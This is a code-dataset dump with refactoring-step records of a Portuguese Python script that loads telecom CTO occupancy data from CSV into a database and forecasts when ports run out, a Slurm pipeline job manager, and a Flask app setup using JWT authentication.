'__main__':\n Main()\n",
"step-4": "from CTO import CTO\nfrom Cidades import Cidades\nfrom Database import Database\nfrom datetime import datetime\n\n\nclass Main:\n\n def __init__(self, cidade_filename='', dados_filename=''):\n print('cidade: ' + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n if dados_filename != '':\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n def insereDados(self):\n hoje = datetime.utcnow()\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append((hoje,) + cto.as_a_tuple() + (previsao,))\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append((hoje,) + cto.as_a_tuple() + (previsao,))\n db = Database()\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery(\n 'SELECT * from concessao where dia = (select Max(dia) from concessao)'\n ):\n self.antigoConcessao[registro[4]] = registro\n for registro in db.executaQuery(\n 'SELECT * from expansao where dia = (select Max(dia) from expansao)'\n ):\n self.antigoExpansao[registro[4]] = registro\n\n\nif __name__ == '__main__':\n Main()\n",
"step-5": "from CTO import CTO\n#from UI import UIManager\nfrom Cidades import Cidades\nfrom Database import Database\nfrom datetime import datetime\n\nclass Main:\n\n def __init__(self, cidade_filename=\"\", dados_filename=\"\"):\n #cidade_filename, dados_filename = UIManager().get_filenames()\n\n print(\"cidade: \" + cidade_filename)\n self.cidades = Cidades(cidade_filename)\n\n if dados_filename != \"\":\n self.processaCSV(dados_filename)\n self.recuperaDados()\n self.insereDados()\n\n\n def processaCSV(self, filename):\n with open(filename, 'r', encoding='ISO-8859-1') as input_file:\n\n self.concessao = {}\n self.expansao = {}\n for line in input_file.readlines():\n attributes = line.split(';')\n\n localidade = str(attributes[14])\n estacao = str(attributes[15])\n cto = str(attributes[1])\n status = str(attributes[13])\n\n if localidade in self.cidades.concessao:\n if cto in self.concessao:\n self.concessao[cto].addLeitura(status)\n else:\n self.concessao[cto] = CTO(localidade, estacao, cto)\n self.concessao[cto].addLeitura(status)\n\n elif localidade in self.cidades.expansao:\n if cto in self.expansao:\n self.expansao[cto].addLeitura(status)\n else:\n self.expansao[cto] = CTO(localidade, estacao, cto)\n self.expansao[cto].addLeitura(status)\n\n\n def insereDados(self):\n hoje = datetime.utcnow()\n #hoje = datetime(2019, 1, 25)\n\n argsCn = []\n for nome, cto in self.concessao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoConcessao[nomeCto][8]\n antigoData = self.antigoConcessao[nomeCto][1]\n\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoConcessao[nomeCto][1]).days\n\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsCn.append(\n (hoje,) + cto.as_a_tuple() + (previsao,)\n )\n\n argsEx = []\n for nome, cto in self.expansao.items():\n nomeCto = cto.dict['CTO']\n try:\n antigoOcupado = self.antigoExpansao[nomeCto][8]\n antigoData = self.antigoExpansao[nomeCto][1]\n\n ocupadoAtual = int(cto.dict['OCUPADO'])\n vagoAtual = int(cto.dict['VAGO'])\n numDias = (hoje - self.antigoExpansao[nomeCto][1]).days\n\n taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias\n previsao = vagoAtual / taxa_crescimento\n except Exception as e:\n previsao = -1\n argsEx.append(\n (hoje,) + cto.as_a_tuple() + (previsao,)\n )\n\n db = Database()\n\n query = \"\"\"INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsCn)\n\n query = \"\"\"INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n db.executaQuery(query, argsEx)\n\n\n def recuperaDados(self):\n db = Database()\n self.antigoConcessao = {}\n self.antigoExpansao = {}\n for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):\n self.antigoConcessao[registro[4]] = registro\n\n for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):\n self.antigoExpansao[registro[4]] = registro\n\n\n\nif __name__ == '__main__':\n Main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#
#
#
##
from __future__ import print_function, unicode_literals
import inspect
import os
import pprint as pp
import time
from time import gmtime, strftime
import subprocess
from local import *
from slurm import *
class Job_status( object ):
""" Enumerate class for job statuses, this is done differently in python 3
"""
FINISHED = 1
FAILED = 2
NO_RESTART = 3
RUNNING = 4
QUEUEING = 5
RESUBMITTED = 6
SUBMITTED = 7
CREATED = 98
KILLED = 99
UNKNOWN = 100
class Job(object):
""" This class is presenting a singular job and all information associated with it.
"""
def __init__(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None):
""" Create a job object
Args:
cmd (str): command to run
step_name (str): name of the step that this command belongs to
output (str): output information to pass on to the next job
limit (str): paramters to pass on to the backend
delete_file (str): File(s) to delete if the job is successful
thread_id (int): id of the thread running this
Returns:
job (obj)
"""
self.status = Job_status.CREATED
self.active = True
self.command = None
self.backend = None
self.output = output
self.step_name = None
self.pre_task_ids = None
self.delete_file = None
self.job_id = None
self.backend_id = None
self.nr_of_tries = 0
self.cmd = cmd
self.step_name = step_name
self.max_memory = None
self.cputime = None
if ( limit is not None ):
self.limit = limit
if ( delete_file is not None ):
self.delete_file = delete_file
if ( thread_id is not None ):
self.thread_id = thread_id
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
def __repr__(self):
return "{name} -> {status}".format( name=self.step_name, status=self.status )
def __str__(self):
return "{name}".format( name=self.step_name )
def delete_tmp_files(self):
""" deletes tmp files
Args:
None
Returns:
boolean: Success/failure
Raises:
None
"""
if self.delete_file is None:
return True
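        # a single filename is normalised to a list so the loop below handles both cases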
if ( isinstance(self.delete_file, str)):
self.delete_file = [ self.delete_file ]
for file_name in self.delete_file:
print( file_name)
if ( os.path.isfile( file_name )):
os.remove( file_name )
return True
class Thread( object):
def __init__( self, name, thread_id ):
self.name = name
self.thread_id = thread_id
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
class Manager( object ):
def __init__(self, pipeline):
""" Creates a manager object
"""
self._jobs = []
self._active_jobs = []
self._threads = []
self._thread_index = {}
self._thread_id = 1
self.local_backend = Local()
self.backend = None
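        # the batch backend (e.g. slurm) is expected to be attached by the caller before jobs are submitted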
self.pipeline = pipeline
def __getitem__(self, item):
""" Generic getter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return getattr(self, item)
except KeyError:
raise AttributeError
def __setitem__(self, item, value):
""" Generic setter function
Raises:
AttributeError is raised if trying to access value starting with _ or unknown value
"""
if ( item.startswith("_")):
raise AttributeError
try:
return setattr(self, item, value)
except KeyError:
raise AttributeError
def add_thread(self, name):
""" Create a new thread object for the manager
Args:
name (str): name of the thread
Returns:
None
"""
thread = Thread( name=name, thread_id=self._thread_id)
self._threads.append( thread )
self._thread_index[ name ] = self._thread_id
self._thread_id += 1
def get_thread_by_name( self, name):
""" gets a thread object based on name
Args:
name (str): name of the thread
Returns:
thread (obj)
Raises:
            raises an assert error if the thread does not exist
"""
assert name in self._thread_index, "No thread named {}".format( name )
        # thread ids start at 1, while the underlying list is zero-indexed
        return self._threads[ self._thread_index[ name ] - 1 ]
def submit_job(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None, system_call=False):
""" Submits a job using the selected backend, setting up the tracking and all that jazz
Args:
cmd (str): command to run
step_name (str): name of the step that this command belongs to
output (str): output information to pass on to the next job
            limit (str): parameters to pass on to the backend
delete_file (str): File(s) to delete if the job is successful
thread_id (int): id of the thread running this
system_call (bool): run the job as a system job (default: false )
Returns:
None
"""
job = Job(cmd, step_name, output, limit, delete_file, thread_id)
self._jobs.append( job )
job.job_id = len( self._jobs) - 1
# print( "Working on: '{}' -> {}".format( job.step_name, job.cmd ))
if ( system_call ) :
job = self.local_backend.system_call( job )
else:
job = self.backend.submit( job )
# print( job.status )
def resubmit_job(self, job):
""" resubmits a job
Args:
job (job): jobid to resubmit
"""
job.nr_of_tries += 1
job.status = Job_status.RESUBMITTED
job = self.backend.submit( job )
def killall(self):
"""kills all submitted/running jobs
"""
        for job in self._jobs:
            job.backend.kill( job )
def job_outputs( self, step_name=None):
"""
Args:
step_name (str): name of the step to collect outputs from
Returns:
list of outputs
"""
outputs = []
prev_steps = self.pipeline._workflow.prev_steps( step_name )
# print("{} :: Prev steps to collect outputs from: {}".format( step_name, prev_steps))
for job in self._jobs:
if job.step_name in prev_steps:
outputs.append( job.output )
# print("{}".format( outputs))
return outputs
def format_memory(self, memory):
""" Format memory into a more readable format
Args:
memory (int): will be cast to float anyway
Returns
Readable memory (str)
"""
        if memory is None:
            return "N/A"
        memory = float( memory)
        if memory == 0:
            return "N/A"
elif ( memory > 1000000000):
return "{:.2f}GB".format(memory / 1000000000)
elif ( memory > 1000000):
return "{:.2f}MB".format(memory / 1000000)
elif ( memory > 1000):
return "{:.2f}KB".format(memory / 1000)
else:
return "{:}".format(int(memory))
def format_time( self, seconds):
""" Markes seconds into a more readable format eg: 10:03:01
Args
Seconds (int): seconds to convert into hours:mins:seconds
returns:
time (str)
"""
if seconds is None:
return "N/A"
seconds = int( seconds )
hours = int(seconds / 3600)
seconds -= hours * 3600
minutes = int(seconds / 60)
seconds -= minutes * 60
seconds = int(seconds )
return "{:02}:{:02}:{:02}".format( hours, minutes, seconds)
def report(self):
""" print the current progress
Args:
None
Returns:
None
"""
job_summary = {}
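        # aggregate per-step counts and resource usage for the progress table printed below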
for job in self._jobs:
if job.step_name not in job_summary:
job_summary[ job.step_name ] = {}
job_summary[ job.step_name ][ 'DONE' ] = 0
job_summary[ job.step_name ][ 'RUNNING' ] = 0
job_summary[ job.step_name ][ 'QUEUING' ] = 0
job_summary[ job.step_name ][ 'FAILED' ] = 0
job_summary[ job.step_name ][ 'UNKNOWN' ] = 0
job_summary[ job.step_name ][ 'max_mem' ] = 0
job_summary[ job.step_name ][ 'cputime' ] = 0
if job.status == Job_status.FINISHED:
job_summary[ job.step_name ][ 'DONE' ] += 1
if job.cputime is not None:
job_summary[ job.step_name ]['cputime'] += int(job.cputime)
if job.max_memory is not None and job.max_memory > job_summary[ job.step_name ][ 'max_mem']:
job_summary[ job.step_name ][ 'max_mem'] = int(job.max_memory)
elif job.status == Job_status.RUNNING:
job_summary[ job.step_name ][ 'RUNNING' ] += 1
elif job.status == Job_status.QUEUEING or job.status == Job_status.SUBMITTED:
job_summary[ job.step_name ][ 'QUEUING' ] += 1
elif job.status == Job_status.FAILED or job.status == Job_status.NO_RESTART:
job_summary[ job.step_name ][ 'FAILED' ] += 1
else:
job_summary[ job.step_name ][ 'UNKNOWN' ] += 1
local_time = strftime("%d/%m/%Y %H:%M", time.localtime())
pickle_file = "{}.{}".format(self.pipeline.project_name, self.pipeline._pid)
print("[{} @{} {}]".format( local_time,self.pipeline._hostname , pickle_file))
print("{:20} || {:12} || {:12} || {:2s} {:2s} {:2s} {:2s} {:2s}".format("Run stats", "Runtime", "Max Mem", "D","R","Q","F","U"))
for step in sorted(self.pipeline._workflow._analysis_order, key=self.pipeline._workflow._analysis_order.__getitem__):
if step not in job_summary:
continue
print("{:20} || {:12} || {:12} || {:02d}/{:02d}/{:02d}/{:02d}/{:02d}".format(step,
self.format_time(job_summary[ step ]['cputime']),
self.format_memory(job_summary[ step ]['max_mem']),
job_summary[ step ][ 'DONE' ],
job_summary[ step ][ 'RUNNING' ],
job_summary[ step ][ 'QUEUING' ],
job_summary[ step ][ 'FAILED' ],
job_summary[ step ][ 'UNKNOWN' ]))
def active_jobs(self):
""" updates the status of and returns all active jobs
Args:
None
Returns:
list of jobs (obj)
"""
active_jobs = []
for job in self._jobs:
if job.active:
job.backend.status( job )
active_jobs.append( job )
self._active_jobs = active_jobs[:]
return active_jobs
def waiting_for_job(self, depends_on ):
""" check if any of the running jobs are in the depends list
Args:
depends_on (list obj): list of steps to check again
Returns:
boolean, True if outstanding dependencies
"""
        # This code is awful, but I don't have the time and brain
# power to fix it right now
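        # first pass: an active job belonging to a step we depend on means we still wait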
for depend_on in depends_on:
for active_job in self._active_jobs:
if (active_job.active and
depend_on.name == active_job.step_name ):
# print("waiting on {}".format(active_job.step_name))
return True
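        # second pass: a dependency step that has produced no job at all has not even started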
for depend_on in depends_on:
job_found = False
for job in self._jobs:
if (depend_on.name == job.step_name ):
job_found = True
if not job_found:
print("{} is waiting to start and finish {}".format( job.step_name, depend_on.name ))
return True
# We are not waiting for any active or steps yet to be performed
return False
def failed_dependency_jobs(self, depends_on ):
""" check if any of the running jobs this one depends on have failed.
Args:
depends_on (list obj): list of steps to check again
Returns:
boolean, True if one or more job has failed and cannot be restarted
"""
for depend_on in depends_on:
for active_job in self._active_jobs:
if (active_job.status == Job_status.NO_RESTART):
print("dependecy {} failed".format(active_job.step_name))
return True
return False
    def _next_id(self):
        ''' generates and returns the next job id from the class
        Returns:
            Next available job id (int)
        '''
        # note: relies on self.job_id having been initialised elsewhere
        self.job_id += 1
        return self.job_id
|
normal
|
{
"blob_id": "222a02f97df5ded6fea49e9eb201ed784a2a2423",
"index": 5037,
"step-1": "#\n# \n# \n##\n\nfrom __future__ import print_function, unicode_literals\nimport inspect\nimport os\nimport pprint as pp\nimport time\nfrom time import gmtime, strftime\nimport subprocess\n\nfrom local import *\nfrom slurm import *\n\nclass Job_status( object ):\n \"\"\" Enumerate class for job statuses, this is done differently in python 3\n\n \"\"\"\n FINISHED = 1\n FAILED = 2\n NO_RESTART = 3\n RUNNING = 4\n QUEUEING = 5\n RESUBMITTED = 6\n SUBMITTED = 7\n CREATED = 98\n KILLED = 99\n UNKNOWN = 100\n\n\nclass Job(object):\n \"\"\" This class is presenting a singular job and all information associated with it. \n\n \"\"\"\n\n\n def __init__(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None):\n \"\"\" Create a job object\n \n Args:\n cmd (str): command to run\n step_name (str): name of the step that this command belongs to\n output (str): output information to pass on to the next job\n limit (str): paramters to pass on to the backend\n delete_file (str): File(s) to delete if the job is successful\n thread_id (int): id of the thread running this \n\n Returns:\n job (obj)\n \"\"\"\n\n self.status = Job_status.CREATED\n self.active = True\n self.command = None\n self.backend = None\n\n self.output = output\n self.step_name = None\n self.pre_task_ids = None\n self.delete_file = None\n self.job_id = None\n self.backend_id = None\n self.nr_of_tries = 0\n\n self.cmd = cmd\n self.step_name = step_name\n self.max_memory = None\n self.cputime = None\n\n\n if ( limit is not None ):\n self.limit = limit\n\n if ( delete_file is not None ):\n self.delete_file = delete_file\n\n if ( thread_id is not None ):\n self.thread_id = thread_id\n\n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n def __repr__(self):\n return \"{name} -> {status}\".format( name=self.step_name, status=self.status )\n\n def __str__(self):\n return \"{name}\".format( name=self.step_name )\n\n \n def delete_tmp_files(self):\n \"\"\" deletes tmp files \n\n Args:\n None\n\n Returns:\n boolean: Success/failure\n\n Raises:\n None\n \"\"\"\n\n if self.delete_file is None:\n return True\n\n if ( isinstance(self.delete_file, str)):\n self.delete_file = [ self.delete_file ] \n \n for file_name in self.delete_file:\n print( file_name)\n if ( os.path.isfile( file_name )):\n os.remove( file_name )\n \n return True\n \n\n\nclass Thread( object):\n\n def __init__( self, name, thread_id ):\n self.name = name\n self.thread_id = thread_id\n \n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( 
item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n\nclass Manager( object ):\n\n\n def __init__(self, pipeline):\n \"\"\" Creates a manager object\n\n \"\"\"\n self._jobs = []\n self._active_jobs = []\n\n self._threads = []\n self._thread_index = {}\n self._thread_id = 1\n\n\n self.local_backend = Local()\n self.backend = None\n\n self.pipeline = pipeline\n\n\n def __getitem__(self, item):\n \"\"\" Generic getter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n \n if ( item.startswith(\"_\")):\n raise AttributeError\n\n try:\n return getattr(self, item)\n except KeyError:\n raise AttributeError\n\n def __setitem__(self, item, value):\n \"\"\" Generic setter function\n\n Raises:\n AttributeError is raised if trying to access value starting with _ or unknown value\n \"\"\"\n\n if ( item.startswith(\"_\")):\n raise AttributeError\n \n try:\n return setattr(self, item, value)\n except KeyError:\n raise AttributeError\n\n def add_thread(self, name):\n \"\"\" Create a new thread object for the manager\n\n Args:\n name (str): name of the thread\n\n Returns:\n None\n\n \"\"\"\n\n thread = Thread( name=name, thread_id=self._thread_id)\n self._threads.append( thread )\n self._thread_index[ name ] = self._thread_id \n\n self._thread_id += 1\n\n\n def get_thread_by_name( self, name):\n \"\"\" gets a thread object based on name\n\n Args:\n name (str): name of the thread\n\n Returns:\n thread (obj)\n\n Raises:\n raises an assert error if the thead does not exist\n\n \"\"\"\n\n assert name in self._thread_index, \"No thread named {}\".format( name )\n\n return self._threads[ self._thread_index[ name ]]\n\n\n \n def submit_job(self, cmd, step_name, output=None, limit=None, delete_file=None, thread_id=None, system_call=False):\n \"\"\" Submits a job using the selected backend, setting up the tracking and all that jazz\n \n Args:\n cmd (str): command to run\n step_name (str): name of the step that this command belongs to\n output (str): output information to pass on to the next job\n limit (str): paramters to pass on to the backend\n delete_file (str): File(s) to delete if the job is successful\n thread_id (int): id of the thread running this \n system_call (bool): run the job as a system job (default: false )\n\n Returns:\n None\n \n \"\"\"\n\n job = Job(cmd, step_name, output, limit, delete_file, thread_id)\n self._jobs.append( job )\n job.job_id = len( self._jobs) - 1\n\n# print( \"Working on: '{}' -> {}\".format( job.step_name, job.cmd ))\n\n if ( system_call ) :\n job = self.local_backend.system_call( job )\n else:\n job = self.backend.submit( job )\n\n# print( job.status )\n \n\n \n def resubmit_job(self, job):\n \"\"\" resubmits a job\n \n Args:\n job (job): jobid to resubmit\n\n \"\"\"\n\n job.nr_of_tries += 1\n job.status = Job_status.RESUBMITTED\n job = self.backend.submit( job )\n\n\n def killall(self):\n \"\"\"kills all submitted/running jobs\n \n \"\"\"\n\n for job_id, job in self.jobs:\n backend.kill( job )\n\n\n\n def job_outputs( self, step_name=None):\n \"\"\"\n \n Args:\n step_name (str): name of the step to collect outputs from\n\n Returns:\n list of outputs\n\n \"\"\"\n\n outputs = []\n prev_steps = self.pipeline._workflow.prev_steps( step_name )\n# print(\"{} :: Prev steps to collect outputs from: {}\".format( step_name, prev_steps))\n for job in self._jobs:\n if job.step_name in prev_steps:\n outputs.append( job.output )\n\n\n# 
print(\"{}\".format( outputs))\n return outputs\n\n\n def format_memory(self, memory):\n \"\"\" Format memory into a more readable format\n\n Args:\n memory (int): will be cast to float anyway\n\n Returns\n Readable memory (str)\n \"\"\"\n\n memory = float( memory) \n\n if memory is None or memory == 0:\n return \"N/A\"\n elif ( memory > 1000000000):\n return \"{:.2f}GB\".format(memory / 1000000000)\n elif ( memory > 1000000):\n return \"{:.2f}MB\".format(memory / 1000000) \n elif ( memory > 1000):\n return \"{:.2f}KB\".format(memory / 1000) \n else:\n return \"{:}\".format(int(memory))\n\n\n\n def format_time( self, seconds):\n \"\"\" Markes seconds into a more readable format eg: 10:03:01\n\n Args\n Seconds (int): seconds to convert into hours:mins:seconds\n\n returns:\n time (str)\n \"\"\"\n\n if seconds is None:\n return \"N/A\"\n\n seconds = int( seconds )\n\n hours = int(seconds / 3600)\n seconds -= hours * 3600\n\n minutes = int(seconds / 60)\n seconds -= minutes * 60\n seconds = int(seconds )\n\n\n return \"{:02}:{:02}:{:02}\".format( hours, minutes, seconds)\n\n\n\n def report(self):\n \"\"\" print the current progress\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n\n job_summary = {}\n for job in self._jobs:\n \n if job.step_name not in job_summary:\n job_summary[ job.step_name ] = {}\n job_summary[ job.step_name ][ 'DONE' ] = 0\n job_summary[ job.step_name ][ 'RUNNING' ] = 0\n job_summary[ job.step_name ][ 'QUEUING' ] = 0\n job_summary[ job.step_name ][ 'FAILED' ] = 0\n job_summary[ job.step_name ][ 'UNKNOWN' ] = 0\n job_summary[ job.step_name ][ 'max_mem' ] = 0\n job_summary[ job.step_name ][ 'cputime' ] = 0\n\n if job.status == Job_status.FINISHED:\n job_summary[ job.step_name ][ 'DONE' ] += 1\n if job.cputime is not None:\n job_summary[ job.step_name ]['cputime'] += int(job.cputime)\n\n if job.max_memory is not None and job.max_memory > job_summary[ job.step_name ][ 'max_mem']:\n job_summary[ job.step_name ][ 'max_mem'] = int(job.max_memory)\n\n elif job.status == Job_status.RUNNING:\n job_summary[ job.step_name ][ 'RUNNING' ] += 1\n elif job.status == Job_status.QUEUEING or job.status == Job_status.SUBMITTED:\n job_summary[ job.step_name ][ 'QUEUING' ] += 1\n elif job.status == Job_status.FAILED or job.status == Job_status.NO_RESTART:\n job_summary[ job.step_name ][ 'FAILED' ] += 1\n else:\n job_summary[ job.step_name ][ 'UNKNOWN' ] += 1\n\n\n\n local_time = strftime(\"%d/%m/%Y %H:%M\", time.localtime())\n \n\n pickle_file = \"{}.{}\".format(self.pipeline.project_name, self.pipeline._pid)\n\n print(\"[{} @{} {}]\".format( local_time,self.pipeline._hostname , pickle_file))\n\n print(\"{:20} || {:12} || {:12} || {:2s} {:2s} {:2s} {:2s} {:2s}\".format(\"Run stats\", \"Runtime\", \"Max Mem\", \"D\",\"R\",\"Q\",\"F\",\"U\"))\n\n for step in sorted(self.pipeline._workflow._analysis_order, key=self.pipeline._workflow._analysis_order.__getitem__):\n if step not in job_summary:\n continue\n\n print(\"{:20} || {:12} || {:12} || {:02d}/{:02d}/{:02d}/{:02d}/{:02d}\".format(step, \n self.format_time(job_summary[ step ]['cputime']),\n self.format_memory(job_summary[ step ]['max_mem']),\n job_summary[ step ][ 'DONE' ],\n job_summary[ step ][ 'RUNNING' ],\n job_summary[ step ][ 'QUEUING' ],\n job_summary[ step ][ 'FAILED' ],\n job_summary[ step ][ 'UNKNOWN' ]))\n \n\n \n\n\n\n def active_jobs(self):\n \"\"\" updates the status of and returns all active jobs \n\n Args:\n None\n\n Returns:\n list of jobs (obj)\n \n \"\"\"\n \n active_jobs = []\n for job in self._jobs:\n if job.active:\n 
job.backend.status( job )\n active_jobs.append( job )\n\n self._active_jobs = active_jobs[:]\n\n return active_jobs\n\n\n def waiting_for_job(self, depends_on ):\n \"\"\" check if any of the running jobs are in the depends list \n\n Args:\n depends_on (list obj): list of steps to check again\n\n Returns:\n boolean, True if outstanding dependencies\n\n \"\"\"\n\n # This code is aweful, but I don't have to time and brain\n # power to fix it right now\n\n for depend_on in depends_on:\n for active_job in self._active_jobs:\n if (active_job.active and \n depend_on.name == active_job.step_name ):\n# print(\"waiting on {}\".format(active_job.step_name))\n return True\n\n\n\n for depend_on in depends_on:\n job_found = False\n for job in self._jobs:\n if (depend_on.name == job.step_name ):\n job_found = True\n\n if not job_found:\n print(\"{} is waiting to start and finish {}\".format( job.step_name, depend_on.name ))\n return True\n\n\n # We are not waiting for any active or steps yet to be performed\n return False\n\n\n\n def failed_dependency_jobs(self, depends_on ):\n \"\"\" check if any of the running jobs this one depends on have failed.\n\n Args:\n depends_on (list obj): list of steps to check again\n\n Returns:\n boolean, True if one or more job has failed and cannot be restarted\n\n \"\"\"\n\n for depend_on in depends_on:\n for active_job in self._active_jobs:\n if (active_job.status == Job_status.NO_RESTART):\n print(\"dependecy {} failed\".format(active_job.step_name))\n return True\n\n return False\n \n\n\n\n def _next_id():\n\t''' generates and returns the next job id from the class\n\n\tReturns:\n Next available job id (int)\n\n\t'''\n self.job_id += 1\n\n return self.job_id\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate
from flask_restful import Api
from flask_apispec.extension import FlaskApiSpec
from server.admin import add_admin
from server.config import Config
from server.db import db
from server.cli import add_commands
from server.login_manager import login_manager
from server.resources import add_routes, register_docs
from server.services import user_service, token_blacklist
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
migrate = Migrate(app, db)
admin = add_admin(app)
api = Api(app, catch_all_404s=True)
jwt = JWTManager(app)
bcrypt = Bcrypt(app)
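# JWT callbacks: look up the current user from the token, map an email identity
# to a user id, and reject any token whose jti is on the blacklist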
@jwt.user_lookup_loader
def user_loader_callback(_jwt_header, jwt_data):
return user_service.first(id=jwt_data['sub'])
@jwt.user_identity_loader
def user_identity_lookup(email):
return user_service.first(email=email).id
@jwt.token_in_blocklist_loader
def check_if_token_in_blocklist(jwt_headers, jwt_payload):
return bool(token_blacklist.get(jwt_payload['jti']))
def create_app():
add_routes(api)
add_commands(app)
login_manager.init_app(app)
docs = FlaskApiSpec(app)
register_docs(docs)
return app
|
normal
|
{
"blob_id": "f1d813ccaf49c8941bf594e22d8683c0ab422a22",
"index": 7632,
"step-1": "<mask token>\n\n\[email protected]_lookup_loader\ndef user_loader_callback(_jwt_header, jwt_data):\n return user_service.first(id=jwt_data['sub'])\n\n\[email protected]_identity_loader\ndef user_identity_lookup(email):\n return user_service.first(email=email).id\n\n\[email protected]_in_blocklist_loader\ndef check_if_token_in_blocklist(jwt_headers, jwt_payload):\n return bool(token_blacklist.get(jwt_payload['jti']))\n\n\ndef create_app():\n add_routes(api)\n add_commands(app)\n login_manager.init_app(app)\n docs = FlaskApiSpec(app)\n register_docs(docs)\n return app\n",
